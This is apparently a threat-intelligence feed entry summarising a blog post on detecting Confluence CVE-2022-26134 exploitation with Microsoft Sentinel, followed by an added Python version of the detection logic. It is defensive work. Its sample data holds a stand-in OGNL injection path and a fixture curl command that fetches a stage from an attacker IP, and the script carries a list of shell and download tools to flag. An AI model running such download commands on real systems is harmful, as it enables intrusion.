Using Microsoft Sentinel to Detect Confluence…
ID: 6da3de29-770a-5cd8-90eb-57a9d070aa79
STIX ID: report--6da3de29-770a-5cd8-90eb-57a9d070aa79
Feed Name: Binary Defense Blog
This student research project documents setting up a vulnerable Atlassian Confluence (v7.13) instance, exploiting CVE-2022-26134 (an unauthenticated OGNL injection in Confluence Server and Data Center that yields remote code execution) to land a C2 beacon, and then building the Microsoft Sentinel side: log collection from the Confluence host, KQL parser functions for the collected logs, KQL detection queries (for example, flagging a URL-encoded '{' in request paths and unusual child processes spawned by the Confluence Java process), and Sentinel analytics rules that raise alerts and group them into incidents for these exploitation attempts.
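To make the two detection ideas concrete, here is an added example (not code from the Binary Defense post, and written in Python rather than the KQL the post uses) that runs the same logic over constructed sample data: combined-format access log lines for a Confluence server and Linux process-creation events. The OGNL payload in the second access line is a non-functional stand-in that only reproduces the encoded "${...}" shape of the injection, the IP addresses are from the TEST-NET-2 documentation range, and the five-minute grouping window and the list of suspicious child process names are assumptions chosen for illustration.

```python
"""Detection logic for the two rules described above, run over constructed
sample data.  Added example, not code from the post; in Sentinel the same
checks would be KQL queries over the ingested tables."""
import re
from datetime import datetime, timedelta
from urllib.parse import unquote

# Constructed Tomcat/Apache combined-format access log lines (not real traffic).
# Line 2 carries a URL-encoded "${...}" in the request path, the shape of a
# CVE-2022-26134 OGNL injection; the payload itself is a non-functional stand-in.
ACCESS_LOG = [
    '198.51.100.20 - - [03/Jun/2022:12:00:01 +0000] "GET /pages/viewpage.action?pageId=1 HTTP/1.1" 200 4521',
    '198.51.100.7 - - [03/Jun/2022:12:00:07 +0000] "GET /%24%7B%28%23x%3D%22id%22%29%7D/ HTTP/1.1" 302 0',
    '198.51.100.20 - - [03/Jun/2022:12:05:30 +0000] "GET /rest/api/content?expand=%7Bbody%7D HTTP/1.1" 200 120',
]

# Constructed process-creation events, as a Linux sensor might forward them.
PROCESS_EVENTS = [
    {"time": "2022-06-03T12:00:08Z", "host": "confluence01",
     "parent": "/opt/atlassian/confluence/jre/bin/java", "process": "/bin/sh",
     "cmdline": "sh -c id"},
    {"time": "2022-06-03T12:00:12Z", "host": "confluence01",
     "parent": "/opt/atlassian/confluence/jre/bin/java", "process": "/usr/bin/curl",
     "cmdline": "curl http://198.51.100.7/stage -o /tmp/s"},
    {"time": "2022-06-03T13:15:00Z", "host": "confluence01",
     "parent": "/bin/bash", "process": "/opt/atlassian/confluence/jre/bin/java",
     "cmdline": "java -version"},
]

ACCESS_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) \S+" (?P<status>\d{3})')

# Assumed list of children the Confluence JVM should never spawn in normal operation.
SHELL_CHILDREN = {"sh", "bash", "dash", "zsh", "curl", "wget",
                  "python", "python3", "perl", "nc", "ncat"}


def parse_access_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = ACCESS_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["time"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def is_encoded_brace_attack(uri):
    """Rule 1: URL-encoded '{' (%7B) in the request *path*, not the query string.
    The Confluence OGNL injection travels in the path, so ignoring the query
    avoids the common false positive of brace-delimited REST parameters."""
    path = uri.split("?", 1)[0]
    return "%7b" in path.lower() or "${" in unquote(path)


def is_suspicious_java_child(evt):
    """Rule 2: java (the Confluence JVM) spawning a shell or download tool."""
    parent = evt["parent"].rsplit("/", 1)[-1]
    child = evt["process"].rsplit("/", 1)[-1]
    return parent == "java" and child in SHELL_CHILDREN


def find_access_hits(lines):
    return [r for r in map(parse_access_line, lines) if r and is_encoded_brace_attack(r["uri"])]


def find_process_hits(events):
    return [e for e in events if is_suspicious_java_child(e)]


def group_incidents(access_hits, process_hits, window=timedelta(minutes=5)):
    """Mirror Sentinel's alert grouping: fold a process alert into the incident
    of an injection request that preceded it within `window` (assumed 5 min),
    otherwise open a new incident for it."""
    incidents = [{"start": h["time"], "entity": h["src"],
                  "alerts": [("encoded_brace", h["uri"])]} for h in access_hits]
    for evt in process_hits:
        t = datetime.fromisoformat(evt["time"].replace("Z", "+00:00"))
        for inc in incidents:
            if inc["start"] <= t <= inc["start"] + window:
                inc["alerts"].append(("java_child", evt["cmdline"]))
                break
        else:
            incidents.append({"start": t, "entity": evt["host"],
                              "alerts": [("java_child", evt["cmdline"])]})
    return incidents


if __name__ == "__main__":
    for inc in group_incidents(find_access_hits(ACCESS_LOG), find_process_hits(PROCESS_EVENTS)):
        print(inc["start"].isoformat(), inc["entity"], [a[0] for a in inc["alerts"]])
```

On the sample data the injection request and the two java-spawned processes that follow it within a few seconds collapse into a single incident, while the benign REST call with %7B in its query string and the operator-run `java -version` are not flagged. Restricting the brace check to the path is the caveat worth carrying into a production KQL rule: matching %7B anywhere in the URL will page on ordinary API traffic.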
